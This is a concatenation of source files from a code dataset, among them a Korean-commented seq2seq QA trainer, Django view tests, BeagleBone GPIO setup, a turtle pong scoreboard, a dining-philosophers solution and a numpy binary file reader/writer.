self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop\n try:\n output = eval_loop(\n eval_dataloader,\n description=\"Evaluation\",\n # metric이 없으면 예측값을 모으는 이유가 없으므로 아래의 코드를 따르게 됩니다.\n prediction_loss_only=True if compute_metrics is None else None,\n ignore_keys=ignore_keys,\n metric_key_prefix=metric_key_prefix,\n )\n finally:\n self.compute_metrics = compute_metrics\n\n if isinstance(eval_dataset, datasets.Dataset):\n eval_dataset.set_format(\n type=eval_dataset.format[\"type\"],\n columns=list(eval_dataset.features.keys()),\n )\n\n if self.post_process_function is not None and self.compute_metrics is not None:\n eval_preds = self.post_process_function(\n examples=eval_examples,\n predictions=output.predictions,\n training_args=self.args,\n tokenizer=self.tokenizer,\n )\n metrics = self.compute_metrics(eval_preds)\n\n # To be JSON-serializable, we need to remove numpy types or zero-d tensors\n metrics = denumpify_detensorize(metrics)\n\n # Prefix all keys with metric_key_prefix + '_'\n for key in list(metrics.keys()):\n if not key.startswith(f\"{metric_key_prefix}_\"):\n metrics[f\"{metric_key_prefix}_{key}\"] = metrics.pop(key)\n\n total_batch_size = self.args.eval_batch_size * self.args.world_size\n metrics.update(\n speed_metrics(\n metric_key_prefix,\n start_time,\n num_samples=output.num_samples,\n num_steps=math.ceil(output.num_samples / total_batch_size),\n )\n )\n self.log(metrics)\n else:\n metrics = {}\n\n if DebugOption.TPU_METRICS_DEBUG in self.args.debug:\n # tpu-comment: PyTorch/XLA에 대한 Logging debug metrics (compile, execute times, ops, etc.)\n xm.master_print(met.metrics_report())\n\n self.control = self.callback_handler.on_evaluate(\n self.args, self.state, self.control, metrics\n )\n\n self._memory_tracker.stop_and_update_metrics(metrics)\n\n return metrics\n\n def predict(\n self,\n test_dataset: datasets.Dataset,\n test_examples: datasets.Dataset,\n ignore_keys: Optional[List[str]] = None,\n metric_key_prefix: str = \"test\",\n mode: str = \"test\",\n max_length: Optional[int] = None,\n num_beams: Optional[int] = None,\n ) -> PredictionOutput:\n \"\"\"\n Run prediction and returns predictions and potential metrics.\n\n Depending on the dataset and your use case, your test dataset may contain labels. In that case, this method\n will also return metrics, like in :obj:`evaluate()`.\n\n Args:\n test_dataset (:obj:`Dataset`):\n Dataset to run the predictions on. If it is an :obj:`datasets.Dataset`, columns not accepted by the\n ``model.forward()`` method are automatically removed. Has to implement the method :obj:`__len__`\n test_examples (datasets.Dataset): \n Origin test datasets for post processing.\n ignore_keys (:obj:`List[str]`, `optional`):\n A list of keys in the output of your model (if it is a dictionary) that should be ignored when\n gathering predictions.\n metric_key_prefix (:obj:`str`, `optional`, defaults to :obj:`\"eval\"`):\n An optional prefix to be used as the metrics key prefix. For example the metrics \"bleu\" will be named\n \"eval_bleu\" if the prefix is ``\"eval\"`` (default)\n mode (str, optional): \n \"evaluate\" or \"predict\" mode for post processing function.\n max_length (:obj:`int`, `optional`):\n The maximum target length to use when predicting with the generate method.\n num_beams (:obj:`int`, `optional`):\n Number of beams for beam search that will be used when predicting with the generate method. 1 means no\n beam search.\n\n .. note::\n\n If your predictions or labels have different sequence lengths (for instance because you're doing dynamic\n padding in a token classification task) the predictions will be padded (on the right) to allow for\n concatenation into one array. The padding index is -100.\n\n Returns: `NamedTuple` A namedtuple with the following keys:\n\n - predictions (:obj:`np.ndarray`): The predictions on :obj:`test_dataset`.\n - label_ids (:obj:`np.ndarray`, `optional`): The labels (if the dataset contained some).\n - metrics (:obj:`Dict[str, float]`, `optional`): The potential dictionary of metrics (if the dataset\n contained labels).\n \"\"\"\n\n self._max_length = max_length if max_length is not None else self.args.generation_max_length\n self._num_beams = num_beams if num_beams is not None else self.args.generation_num_beams\n # memory metrics - must set up as early as possible\n self._memory_tracker.start()\n\n test_dataloader = self.get_test_dataloader(test_dataset)\n start_time = time.time()\n\n # 일시적으로 metric computation를 불가능하게 한 상태이며, 해당 코드에서는 loop 내에서 metric 계산을 수행합니다.\n # evaluate 함수와 동일하게 구성되어있습니다\n compute_metrics = self.compute_metrics\n self.compute_metrics = None\n eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop\n try:\n output = eval_loop(\n test_dataloader,\n description=\"Prediction\",\n ignore_keys=ignore_keys,\n metric_key_prefix=metric_key_prefix,\n )\n finally:\n self.compute_metrics = compute_metrics\n\n if self.post_process_function is None or self.compute_metrics is None:\n return output\n\n if isinstance(test_dataset, datasets.Dataset):\n test_dataset.set_format(\n type=test_dataset.format[\"type\"],\n columns=list(test_dataset.features.keys()),\n )\n\n predictions = self.post_process_function(\n examples=test_examples,\n predictions=output.predictions,\n training_args=self.args,\n tokenizer=self.tokenizer,\n )\n\n # self._memory_tracker.stop_and_update_metrics(output.metrics)\n\n return predictions\n","sub_path":"solution/reader/trainers/seq2seq_qa.py","file_name":"seq2seq_qa.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"257715495","text":"# Euclidean distance between two sets of points\t\n# realisation with loops\ndef dist_loop(training, test):\n \n n1, d = training.shape\n n2, d1 = test.shape\n \n assert n1 != 0, 'Training set is empty'\n assert n2 != 0, 'Test set is empty'\n assert d==d1, 'Images in training and test sets have different size'\n\n tstart = time.time()\n \n dist = np.zeros((n1,n2), dtype = np.float32)\n \n for i in range(0,n1):\n for j in range(0,n2):\n diff = training[i,:]-test[j,:]\n dist[i,j] = np.sum(np.square(diff), axis=0)\n \n dist = np.sqrt(dist)\n tstop = time.time()\n \n return dist, tstop-tstart\n# end dist_loops","sub_path":"MachineLeraning/Exercises/ex01/text/dist_loop.py","file_name":"dist_loop.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87806992","text":"from nose.tools import eq_, ok_\n\nfrom funfactory.urlresolvers import reverse\n\nfrom airmozilla.main.models import Participant\nfrom .base import ManageTestCase\n\n\nclass TestParticipants(ManageTestCase):\n def test_participant_pages(self):\n \"\"\"Participants pagination always returns valid pages.\"\"\"\n response = self.client.get(reverse('manage:participants'))\n eq_(response.status_code, 200)\n response = self.client.get(reverse('manage:participants'),\n {'page': 5000})\n eq_(response.status_code, 200)\n\n def test_participant_find(self):\n \"\"\"Search filters participants; returns all for bad search.\"\"\"\n response_ok = self.client.post(\n reverse('manage:participants'),\n {\n 'name': 'Tim'\n }\n )\n eq_(response_ok.status_code, 200)\n ok_(response_ok.content.find('Tim') >= 0)\n response_fail = self.client.post(\n reverse('manage:participants'),\n {\n 'name': 'Lincoln'\n }\n )\n eq_(response_fail.status_code, 200)\n ok_(response_fail.content.find('Tim') >= 0)\n\n def test_participant_edit(self):\n \"\"\"Participant edit page responds OK; bad form results in failure;\n submission induces a change.\n \"\"\"\n participant = Participant.objects.get(name='Tim Mickel')\n response = self.client.get(reverse('manage:participant_edit',\n kwargs={'id': participant.id}))\n eq_(response.status_code, 200)\n response_ok = self.client.post(\n reverse('manage:participant_edit', kwargs={'id': participant.id}),\n {\n 'name': 'George Washington',\n 'email': 'george@whitehouse.gov',\n 'role': Participant.ROLE_PRINCIPAL_PRESENTER,\n 'cleared': Participant.CLEARED_YES\n }\n )\n self.assertRedirects(response_ok, reverse('manage:participants'))\n participant_george = Participant.objects.get(id=participant.id)\n eq_(participant_george.name, 'George Washington')\n response_fail = self.client.post(\n reverse('manage:participant_edit', kwargs={'id': participant.id}),\n {\n 'name': 'George Washington',\n 'email': 'bademail'\n }\n )\n eq_(response_fail.status_code, 200)\n\n def test_participant_email(self):\n \"\"\"Participant email page generates a token, redirects properly.\"\"\"\n participant = Participant.objects.get(name='Tim Mickel')\n participant.clear_token = ''\n participant.save()\n url = reverse('manage:participant_email',\n kwargs={'id': participant.id})\n response = self.client.get(url)\n eq_(response.status_code, 200)\n participant = Participant.objects.get(name='Tim Mickel')\n ok_(participant.clear_token)\n response_redirect = self.client.post(url)\n self.assertRedirects(response_redirect, reverse('manage:participants'))\n\n def test_participant_new(self):\n \"\"\"New participant page responds OK and form works as expected.\"\"\"\n response = self.client.get(reverse('manage:participant_new'))\n eq_(response.status_code, 200)\n with open('airmozilla/manage/tests/firefox.png') as fp:\n response_ok = self.client.post(\n reverse('manage:participant_new'),\n {\n 'name': 'Mozilla Firefox',\n 'slug': 'mozilla-firefox',\n 'photo': fp,\n 'email': 'mozilla@mozilla.com',\n 'role': Participant.ROLE_PRINCIPAL_PRESENTER,\n 'cleared': Participant.CLEARED_NO\n }\n )\n self.assertRedirects(response_ok, reverse('manage:participants'))\n participant = Participant.objects.get(name='Mozilla Firefox')\n eq_(participant.email, 'mozilla@mozilla.com')\n eq_(participant.creator, self.user)\n\n def test_participant_remove(self):\n participant = Participant.objects.get(name='Tim Mickel')\n self._delete_test(participant, 'manage:participant_remove',\n 'manage:participants')\n","sub_path":"airmozilla/manage/tests/views/test_participants.py","file_name":"test_participants.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"407746690","text":"'''\nCreated on Dec 14, 2015\n\n@author: Shannon Litwin\n'''\n\n\nimport Adafruit_BBIO.ADC as ADC\nimport Adafruit_BBIO.GPIO as GPIO\nfrom Adafruit_I2C import Adafruit_I2C as I2C\nimport Adafruit_BBIO.PWM as PWM\nfrom smbus import SMBus\nimport time\n\ndef initialize_motors():\n freq = 50\n duty = 0\n polarity = 1\n \n leftForward = \"P8_46\"\n leftBackward = \"P8_45\"\n rightForward = \"P9_14\"\n rightBackward = \"P9_16\"\n \n PWM.start(leftForward, duty, freq, polarity)\n PWM.start(leftBackward, duty, freq, polarity)\n PWM.start(rightForward, duty, freq, polarity)\n PWM.start(rightBackward, duty, freq, polarity)\n\n######################################################################\n\n\ndef initialize_LED(): \n greenLight = \"P8_27\"\n blueLight = \"P8_28\"\n redLight = \"P8_29\"\n \n GPIO.setup(greenLight, GPIO.OUT)\n GPIO.setup(blueLight, GPIO.OUT)\n GPIO.setup(redLight, GPIO.OUT)\n\n######################################################################\n\ndef initialize_ADC_sensors():\n ADC.setup()\n######################################################################\n\ndef cleanup_all():\n GPIO.cleanup()\n PWM.cleanup()\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","sub_path":"PythonLibraries/Py_Startup_Funcs.py","file_name":"Py_Startup_Funcs.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"456489114","text":"from turtle import Turtle\r\nALIGNMENT = \"center\"\r\nFONT = (\"Courier\", 60, \"normal\")\r\nY = 200\r\nLEFT_X = -100\r\nRIGHT_X = 100\r\n\r\n\r\nclass Scoreboard(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.penup()\r\n self.color(\"white\")\r\n self.hideturtle()\r\n self.l_score = 0\r\n self.r_score = 0\r\n self.update_scoreboard()\r\n\r\n def update_scoreboard(self):\r\n self.clear()\r\n self.goto(LEFT_X, Y)\r\n self.write(f\"{self.l_score}\", align=ALIGNMENT, font=FONT)\r\n self.goto(RIGHT_X, Y)\r\n self.write(f\"{self.r_score}\", align=ALIGNMENT, font=FONT)\r\n\r\n def l_point(self):\r\n self.l_score += 1\r\n self.update_scoreboard()\r\n\r\n def r_point(self):\r\n self.r_score += 1\r\n self.update_scoreboard()\r\n\r\n","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23129000","text":"import hashlib\nimport web\nimport lxml\nimport time\nimport urllib2,json\nimport os\nimport sys\nsys.path.append('handler')\nsys.path.append('handler/normal_handler')\nimport text_handler\n# import link_handler\n# import video_handler\n# import image_handler\n# import location_handler\n# import short_video_handler\n# import voice_recognized_handler\n# import voice_unrecognized_handler\n# sys.path.append('handler/event_handler')\n# import sub_event_handler\n# import click_event_handler\n# import unsub_event_handler\n# import location_event_handler\n# import scan_after_sub_event_handler\n# import scan_before_sub_event_handler\n\nfrom lxml import etree\n\nclass WeixinRequest:\n def __init__(self):\n self.app_root = os.path.dirname(__file__)\n self.templates_root = os.path.join(self.app_root, 'templates')\n self.render = web.template.render(self.templates_root)\n \n #Check Token to initialize server resource\n def GET(self):\n data = web.input()\n signature = data.signature\n timestamp = data.timestamp\n nonce = data.nonce\n echostr = data.echostr\n token = 'leopenweixin'\n list = [token,timestamp,nonce]\n list.sort()\n sha1 = hashlib.sha1()\n map(sha1.update,list)\n hashcode = sha1.hexdigest()\n \n if hashcode == signature:\n return echostr\n \n #check POST parameters to decide which function will be executed\n def POST(self):\n str_xml = web.data()\n xml = etree.fromstring(str_xml)#analyze xml file\n msg_type = xml.find('MsgType').text\n if msg_type == 'text':\n text_hanlder_obj = text_handler.TextHandler(xml)#it's all ok until here\n response = text_hanlder_obj.prefix_handler()\n response = ResponseForWeixin(response, self)\n response.response_handler()\n\n # elif msgType == 'image':\n # image()\n # elif msgType == 'voice':\n # voice()\n # elif msgType == 'video':\n # video()\n # elif msgType == 'shortvideo':\n # shortvideo()\n # elif msgType == 'location':\n # location()\n # elif msgType == 'link':\n # link()\n # elif msgType == 'event':\n # event()\n\nclass ResponseForWeixin:\n def __init__(self, response, post_object):\n self.response = response\n self.post_object = post_object\n\n #determing which response function would be excuted by response type\n def response_handler(self):\n if self.response.type == 'text':\n response_text()\n # elif self.response.type == '':\n # pass\n # else:\n # pass\n\n #define response functions by different templates\n def reponse_text(self):\n self.post_object.render.reply_text(self.response.from_user,self.response.to_user,int(time.time()),self.response.content)\n","sub_path":"weixin_request.py","file_name":"weixin_request.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"99674748","text":"\"\"\"\nAn example of the deadlock-philosopher problem we talked about. Needs fixing!\n\n9/23/2019 ASR\nImplement a 'Waiter' entity to manage the philosophers.\nThe rules for waiter-philosopher interaction shall be:\n(1) philosophers must queue up to ask the waiter's permission before picking up a fork\n(2) the waiter only allows a philosopher to pick up both forks or none at all (and return to back of the line).\n(3) philosophers can put down forks without the waiter's permission\n\"\"\"\n\n# For the purpose of this example, a fork will literally be a threading.Lock\n# object but thematically it makes more sense in context of what we talked about\n# to keep calling it a fork :D\nfrom threading import Lock as Fork\nfrom threading import Thread\nfrom time import sleep, time\n\nclass Plate:\n def __init__(self, seats_per_table, meals, meal_consumption_time, left_fork=None, right_fork=None,):\n self.left = left_fork\n self.right = right_fork\n self.meals_eaten = 0\n\n self.seats_per_table = seats_per_table\n self.meals = meals\n self.meal_consumption_time = meal_consumption_time\n\n\n def eat(self, meal_consumption_time):\n sleep(meal_consumption_time)\n self.meals_eaten += 1\n\nclass Philosoper(Thread):\n def __init__(self, number, waiter=None):\n super(Philosoper, self).__init__()\n self.number = number\n self.plate = None\n self.waiter = waiter\n\n def run(self):\n meals = self.plate.meals\n meal_consumption_time = self.plate.meal_consumption_time\n seats_per_table = self.plate.seats_per_table\n\n for meal in range(meals):\n # Get index for left fork and right fork before asking the waiter\n # eater index goes with fork index and index - 1 (see Table class setting)\n n = self.number\n fork1_index = n\n if n == 0:\n fork2_index = seats_per_table - 1 # wrap around!\n else:\n fork2_index = n - 1\n\n # Ask Jeeves\n while True:\n with self.waiter._attention:\n can_i = self.waiter.ask(fork1_index, fork2_index)\n if can_i == 'yes':\n# print(f\"philo {self.number} got a {can_i}. He stops asking, grabs the forks, and digs in...\")\n self.plate.left.acquire()\n self.plate.right.acquire()\n break\n else:\n# print(f\"philo {self.number} got a {can_i} and asks again!...\")\n continue\n # Dig in.\n self.plate.eat(meal_consumption_time)\n # put down the forks when finished eating\n self.plate.left.release()\n self.plate.right.release()\n # Update Jeeves' list; the forks are available. We don't need to wait for his attention here.\n self.waiter.markForkAvailable(fork1_index, fork2_index)\n\nclass Waiter:\n def __init__(self, seats, forks, plates):\n # Upon hire, the waiter is given a list of seats, forks, and plates to track.\n # The waiter keeps a list of which forks are available. 0 for not-in-use. 1 for in-use.\n self._seats = seats\n self._forks = forks\n self._plates = plates\n\n # Endow Jeeves with singular attention (as a lock or \"fork\")\n self._attention = Fork()\n\n def __enter__(self):\n self._attention.acquire()\n\n def __exit__(self):\n self._attention.release()\n\n def makeForkStatusList(self):\n # initially set all forks status to 0, \"not in use\"\n # it lines up against indices for Forks list\n self._forkStatus = [\n [fork, 0] for fork in range(len(self._forks))\n ]\n\n def markForkInUse(self, fork1_index, fork2_index):\n self._forkStatus[fork1_index][1] = 1\n self._forkStatus[fork2_index][1] = 1\n# print(f\"forks {fork1_index} and {fork2_index} now IN USE.\")\n\n def markForkAvailable(self, fork1_index, fork2_index):\n self._forkStatus[fork1_index][1] = 0\n self._forkStatus[fork2_index][1] = 0\n# print(f\"forks {fork1_index} and {fork2_index} now AVAIL.\")\n\n\n def ask(self, fork1_index, fork2_index):\n # Philosopher asks the waiter to pick up his forks, passing in the fork indices.\n # Waiter checks his list.\n # If fork1 and fork2 are available, he gives this philosopher 'yes' and changes these forks status to 1, \"in use\".\n # If they aren't both available, he gives this philosopher a 'no'.\n if self._forkStatus[fork1_index][1] == 0 and self._forkStatus[fork2_index][1] == 0:\n # check out the forks to this philosopher\n self.markForkInUse(fork1_index, fork2_index)\n return 'yes'\n else:\n # give a 'no'\n return 'no'\n\nclass Table:\n def __init__(self, seats, meals, meal_consumption_time):\n\n self.meals = meals\n self.meal_consumption_time = meal_consumption_time\n self.seats_per_table = seats\n\n # Create seats with philosophers sitting in them\n self._seats = [Philosoper(n) for n in range(seats)]\n # Make a left fork for each seat (ultimately, the right fork will be the\n # left fork of the previous seat)\n self._forks = [\n Fork()\n for seat in self._seats\n ]\n # Create the plates\n self._plates = [\n Plate(self.seats_per_table, self.meals, self.meal_consumption_time)\n for seat in self._seats\n ]\n\n # Assign the forks to the plates\n previous_left_fork = None\n for plate, fork in zip(self._plates, self._forks):\n plate.left = fork\n plate.right = previous_left_fork\n previous_left_fork = fork\n\n # Don't forget to wrap around!\n self._plates[0].right = previous_left_fork\n\n # Hire the waiter *ahem* Jeeves, giving him the list of seats, forks, and plates\n Jeeves = Waiter(self._seats, self._forks, self._plates)\n Jeeves.makeForkStatusList() # initially all forks are available\n # assign Jeeves to the table\n self._waiter = Jeeves\n\n # Let the philosophers know Jeeves is the waiter.\n for philo in self._seats:\n philo.waiter = Jeeves\n\n def go(self):\n start_time = time()\n # Give everyone a plate and dig in\n for eater, plate in zip(self._seats, self._plates):\n eater.plate = plate\n eater.start()\n\n # Wait for eaters to finish...\n for eater in self._seats:\n eater.join()\n end_time = time()\n\n # how long did it take?\n delta_t = end_time - start_time\n print(f\"Successfully eating {self.meals} meals of {self.meal_consumption_time}s size in {delta_t} seconds\")\n return delta_t\n\n","sub_path":"Project1 - Dining Philosophers/philosopher_waiter_module.py","file_name":"philosopher_waiter_module.py","file_ext":"py","file_size_in_byte":6875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167895720","text":"# Write a class to hold player information, e.g. what room they are in\n# currently.\n\nfrom item import LightSource\nclass Player:\n def __init__(self, current_room, score = 0):\n self.current_room = current_room\n self.inventory = []\n self.score = score\n\n def handle_user_input(self, user_input):\n self.user_input = user_input\n if len(self.user_input.split()) == 1:\n self.handle_one_word_command()\n else:\n self.handle_two_word_command()\n\n def handle_one_word_command(self):\n if self.user_input == 'i' or self.user_input == 'inventory':\n self.list_inventory()\n elif self.user_input == 'score':\n self.display_score()\n else:\n self.move(self.user_input)\n\n def display_score(self):\n print(f'Current score is {self.score}')\n\n def list_inventory(self):\n print(f'You have: {[i.name for i in self.inventory]}')\n\n def handle_two_word_command(self):\n commands = self.user_input.split()\n command = commands[0]\n item = commands[1]\n\n if command == 'get' or command == 'take':\n self.get(item)\n elif command == 'drop':\n self.drop(item)\n else:\n print(\"I don't understand that command\\n\")\n\n def light_source_exists(self):\n if self.current_room.is_light:\n return True\n if [ item for item in self.inventory if isinstance(item, LightSource) ]:\n return True\n if [ item for item in self.current_room.items if isinstance(item, LightSource) ]:\n return True\n\n return False\n\n def get(self, item_name):\n # get index of item we're getting\n index = next((i for i, item in enumerate(self.current_room.items) if item.name == item_name), -1)\n if index != -1:\n if not self.light_source_exists():\n print(\"Good luck finding that in the dark!\")\n return\n\n gotten_item = self.current_room.items.pop(index);\n self.inventory.append(gotten_item)\n gotten_item.on_take(self)\n else:\n print(f'Error! {item_name} is not present in this room')\n\n def drop(self, item_name):\n # get index of item we're dropping\n index = next((i for i, item in enumerate(self.inventory) if item.name == item_name), -1)\n if index != -1:\n dropped_item = self.inventory.pop(index);\n self.current_room.items.append(dropped_item)\n dropped_item.on_drop()\n else:\n print(f'Error! You do not have {item_name} to drop')\n\n def move(self, direction):\n if hasattr(self.current_room, f'{direction}_to'):\n next_room = getattr(self.current_room, f'{direction}_to')\n if not next_room:\n print(\"You've reached a dead end!!!\\n\")\n else:\n self.current_room = next_room\n else:\n print(\"I don't understand that command\\n\")\n","sub_path":"src/adv/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349937157","text":"import numpy\r\nimport os\r\nimport bz2\r\nimport gzip\r\nimport multiprocessing\r\nimport time\r\nimport zipfile \r\n\r\nclass scio:\r\n def __init__(self,fname,arr=None,status='w',compress=None,diff=False):\r\n if not(compress is None):\r\n if len(compress)==0:\r\n compress=None\r\n self.fid=open(fname,status)\r\n self.fname=fname\r\n self.diff=diff\r\n self.last=None\r\n self.compress=compress\r\n self.closed=False\r\n\r\n if arr is None:\r\n self.dtype=None\r\n self.shape=None\r\n self.initialized=False\r\n else:\r\n self.dtype=arr.dtype\r\n self.shape=arr.shape\r\n self.initialized=True\r\n self.write_header(arr)\r\n self.append(arr)\r\n\r\n \r\n def __del__(self):\r\n if self.closed==False:\r\n print('closing scio file ' + self.fname)\r\n self.fid.flush() \r\n self.fid.close()\r\n self.closed=True\r\n if not(self.compress is None):\r\n to_exec=self.compress + ' ' + self.fname\r\n os.system(to_exec)\r\n\r\n\r\n def close(self):\r\n self.__del__()\r\n def write_header(self,arr):\r\n sz=arr.shape\r\n myvec=numpy.zeros(len(sz)+2,dtype='int32')\r\n myvec[0]=len(sz)\r\n if self.diff:\r\n myvec[0]=-1*myvec[0]\r\n for i in range(len(sz)):\r\n myvec[i+1]=sz[i]\r\n myvec[-1]=dtype2int(arr)\r\n myvec.tofile(self.fid)\r\n\r\n \r\n def append(self,arr):\r\n if self.initialized==False:\r\n self.dtype=arr.dtype\r\n self.shape=arr.shape\r\n self.write_header(arr)\r\n self.initialized=True\r\n\r\n if (arr.shape==self.shape):\r\n pass\r\n else:\r\n print(\"shape mismatch in scio.append\")\r\n if (arr.dtype==self.dtype):\r\n if (self.diff):\r\n if self.last is None:\r\n arr_use=arr\r\n else:\r\n arr_use=arr-self.last\r\n self.last=arr.copy()\r\n else:\r\n arr_use=arr\r\n arr_use.tofile(self.fid)\r\n self.fid.flush()\r\n else:\r\n print('dtype mismatch in scio.append on file ' + self.fname)\r\n \r\n \r\n#def append(arr,fname,overwrite=False):\r\n# asdf='abc'\r\n# assert(type(fname)==type(asdf))\r\n# asdf=numpy.zeros(2)\r\n# assert(type(arr)==type(asdf))\r\n# if overwrite:\r\n# os.system('rm ' + fname)\r\n# \r\n# if (os.path.isfile(fname)):\r\n# f=open(fname,'a')\r\n# arr.tofile(f)\r\n# f.close()\r\n# else:\r\n# print 'creating ' + fname\r\n# f=open(fname,'w')\r\n# sz=arr.shape\r\n# myvec=numpy.zeros(len(sz)+2,dtype='int32')\r\n# myvec[0]=len(sz)\r\n# for i in range(len(sz)):\r\n# myvec[i+1]=sz[i]\r\n# myvec[-1]=dtype2int(arr)\r\n# #print myvec\r\n# #print sz\r\n# #print type(myvec)\r\n# myvec.tofile(f)\r\n# arr.tofile(f)\r\n# f.close()\r\n\r\ndef _read_from_string(mystr):\r\n icur=0;\r\n ndim=numpy.fromstring(mystr[icur:icur+4],dtype='int32')[0]\r\n icur=icur+4\r\n if (ndim<0):\r\n diff=True\r\n ndim=-1*ndim\r\n else:\r\n diff=False \r\n #print 'ndim is ',ndim\r\n sz=numpy.fromstring(mystr[icur:icur+4*ndim],'int32')\r\n icur=icur+4*ndim\r\n mytype=numpy.fromstring(mystr[icur:icur+4],'int32')[0]\r\n icur=icur+4\r\n\r\n #check for file size sanity\r\n bytes_per_frame=int2nbyte(mytype)*numpy.product(sz)\r\n cur_bytes=len(mystr)-icur\r\n n_to_cut=numpy.remainder(cur_bytes,bytes_per_frame)\r\n if n_to_cut>0:\r\n #print 'current len: ',len(mystr)\r\n print('We have a byte mismatch in reading scio file. Truncating ' + repr(n_to_cut) + ' bytes.')\r\n mystr=mystr[:-n_to_cut]\r\n #print 'new len: ',len(mystr)\r\n \r\n vec=numpy.fromstring(mystr[icur:],dtype=int2dtype(mytype))\r\n\r\n nmat=vec.size/numpy.product(sz)\r\n new_sz=numpy.zeros(sz.size+1,dtype='int32')\r\n new_sz[0]=nmat\r\n new_sz[1:]=sz\r\n\r\n mat=numpy.reshape(vec,new_sz)\r\n if diff:\r\n mat=numpy.cumsum(mat,0)\r\n\r\n return mat\r\n \r\n\r\ndef _read_file_as_string(fname):\r\n if fname[-4:]=='.bz2':\r\n f=bz2.BZ2File(fname,'r')\r\n mystr=f.read()\r\n f.close()\r\n return mystr\r\n if fname[-3:]=='.gz':\r\n f=gzip.GzipFile(fname,'r')\r\n mystr=f.read()\r\n f.close()\r\n return mystr\r\n\r\n #if we get here, assume it's raw binary\r\n f=open(fname,'rb')\r\n mystr=f.read()\r\n f.close()\r\n return mystr\r\n\r\ndef read_from_archive(fname,arcname,strict=False):\r\n if isinstance(arcname,str):\r\n f=zipfile.ZipFile(arcname)\r\n else:\r\n f=arcname\r\n fname=f.namelist()[0]+fname\r\n mystr=None\r\n if fname in f.namelist():\r\n mystr=f.read(fname)\r\n elif fname+'.bz2' in f.namelist():\r\n tmp=f.read(fname+'.bz2')\r\n mystr=bz2.decompress(tmp)\r\n elif fname+'.gz' in f.namelist():\r\n tmp=f.read(fname+'.bz2')\r\n mystr=gzip.decompress(tmp)\r\n if mystr is None:\r\n print(fname,' not found in ',arcname)\r\n return None\r\n return _read_from_string(mystr)\r\n\r\ndef read(fname,strict=False):\r\n if True:\r\n if strict:\r\n #only read the filename passed in\r\n mystr=_read_file_as_string(fname)\r\n return _read_from_string(mystr)\r\n else:\r\n #try some guesses about what other sane filenames might be based on the input filename\r\n fnames=[fname]\r\n if fname[-4:]=='.bz2':\r\n fnames.append(fname[:-4])\r\n if fname[-3:]=='.gz':\r\n fnames.append(fname[:-3])\r\n fnames.append(fname+'.bz2')\r\n fnames.append(fname+'.gz')\r\n \r\n for fname in fnames:\r\n try:\r\n mystr=_read_file_as_string(fname)\r\n if len(mystr)>0:\r\n try: #try/except loop added by JLS 11 June 2019 to catch cases where string length is unexpected\r\n return _read_from_string(mystr)\r\n except:\r\n print('File ',fname,' appears to be garbled when parsing string of length ',len(mystr))\r\n return None\r\n else:\r\n return None\r\n except:\r\n pass\r\n return None\r\n if fname[-4:]=='.bz2':\r\n return read_bz2(fname)\r\n f=open(fname)\r\n ndim=numpy.fromfile(f,'int32',1)\r\n if (ndim<0):\r\n diff=True\r\n ndim=-1*ndim\r\n else:\r\n diff=False\r\n \r\n sz=numpy.fromfile(f,'int32',ndim)\r\n mytype=numpy.fromfile(f,'int32',1)\r\n vec=numpy.fromfile(f,dtype=int2dtype(mytype))\r\n nmat=vec.size/numpy.product(sz)\r\n new_sz=numpy.zeros(sz.size+1,dtype='int32')\r\n new_sz[0]=nmat\r\n new_sz[1:]=sz\r\n\r\n\r\n mat=numpy.reshape(vec,new_sz)\r\n if diff:\r\n mat=numpy.cumsum(mat,0)\r\n\r\n return mat\r\n\r\ndef read_files(fnames,ncpu=0):\r\n t1=time.time()\r\n if ncpu==0:\r\n ncpu=multiprocessing.cpu_count()\r\n p=multiprocessing.Pool(ncpu)\r\n data=p.map(read,fnames)\r\n #without the p.terminate, the pool seems to last, which can cause the system to run out of processes.\r\n #this isn't what the documentation says should happen (terminate is supposed to get called when p \r\n #gets garbage collected), but oh well...\r\n p.terminate() \r\n t2=time.time()\r\n #print 'took ',t2-t1, ' seconds to read files in scio.'\r\n return data\r\n\r\n\r\n\r\ndef int2dtype(myint):\r\n if (myint==8):\r\n return 'float64'\r\n if (myint==4):\r\n return 'float32'\r\n if (myint==-4):\r\n return 'int32'\r\n if (myint==-8):\r\n return 'int64'\r\n if (myint==-104):\r\n return 'uint32'\r\n if (myint==-108):\r\n return 'uint64'\r\n \r\ndef int2nbyte(myint):\r\n nbyte=numpy.abs(myint)\r\n if nbyte>100:\r\n nbyte=nbyte-100\r\n return nbyte\r\n\r\ndef dtype2int(dtype_str):\r\n \r\n if (type(dtype_str)!=numpy.dtype):\r\n dtype_str=dtype_str.dtype\r\n\r\n aa=numpy.zeros(1,dtype='float64')\r\n if (dtype_str==aa.dtype):\r\n return 8\r\n\r\n aa=numpy.zeros(1,dtype='float32')\r\n if (dtype_str==aa.dtype):\r\n return 4\r\n \r\n\r\n aa=numpy.zeros(1,dtype='int32')\r\n if (dtype_str==aa.dtype):\r\n return -4\r\n \r\n aa=numpy.zeros(1,dtype='int64')\r\n if (dtype_str==aa.dtype):\r\n return -8\r\n\r\n aa=numpy.zeros(1,dtype='uint32')\r\n if (dtype_str==aa.dtype):\r\n return -104\r\n\r\n aa=numpy.zeros(1,dtype='uint64')\r\n if (dtype_str==aa.dtype):\r\n return -108\r\n 